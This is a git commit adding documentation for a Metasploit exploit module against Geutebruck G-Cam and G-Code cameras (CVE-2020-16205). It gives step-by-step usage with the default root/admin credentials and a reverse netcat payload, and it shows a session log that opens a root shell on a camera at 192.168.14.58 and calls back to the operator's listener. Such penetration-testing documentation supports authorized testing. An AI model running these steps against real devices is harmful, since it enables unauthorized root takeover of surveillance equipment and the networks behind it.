Add documentation for Geutebruck G-CAM exploit
This commit is contained in:
ddouhine
gwillcox-r7
parent
a5e25f5a42
commit
a14a2fe8d2
|
|
@ -0,0 +1,68 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models:
|
||||
G-Code:
|
||||
EEC-2xxx
|
||||
G-Cam:
|
||||
EBC-21xx
|
||||
EFD-22xx
|
||||
ETHC-22xx
|
||||
EWPC-22xx
|
||||
|
||||
### Description
|
||||
|
||||
This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products.
|
||||
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
|
||||
Tested it with the 1.12.14.5 firmware only.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
List the steps needed to make sure this thing works
|
||||
|
||||
1. Do: `use exploit/linux/http/geutebruck_testaction_exec`
|
||||
2. Do: `set httpusername root`
|
||||
3. Do: `set httppassword admin`
|
||||
4. Do: `set lhost 192.168.14.1`
|
||||
5. Do: `set rhosts 192.168.14.58`
|
||||
6. Do: `set payload cmd/unix/reverse_netcat_gaping`
|
||||
7. Do: `check`
|
||||
8. Do: `exploit`
|
||||
|
||||
## Options
|
||||
|
||||
### HTTPUSERNAME
|
||||
|
||||
A username used to authenticate on the admin page. **Default: root**
|
||||
|
||||
### HTTPPASSWORD
|
||||
|
||||
The password of the username used to authenticate on the admin page. **Default: admin**
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/geutebruck_testaction_exec
|
||||
msf5 exploit(linux/http/geutebruck_testaction_exec) >
|
||||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping
|
||||
payload => cmd/unix/reverse_netcat_gaping
|
||||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root
|
||||
httpusername => root
|
||||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin
|
||||
httppassword => admin
|
||||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1
|
||||
lhost => 192.168.14.1
|
||||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58
|
||||
rhosts => 192.168.14.58
|
||||
msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.14.1:4444
|
||||
[*] 192.168.14.58:80 - Attempting to exploit...
|
||||
[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200
|
||||
pwd
|
||||
|
||||
/tmp/www_ramdisk/uapi-cgi/admin
|
||||
id
|
||||
uid=0(root) gid=0(root)
|
||||
uname -a
|
||||
Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux
|
||||
```
|
||||
Loading…
Reference in New Issue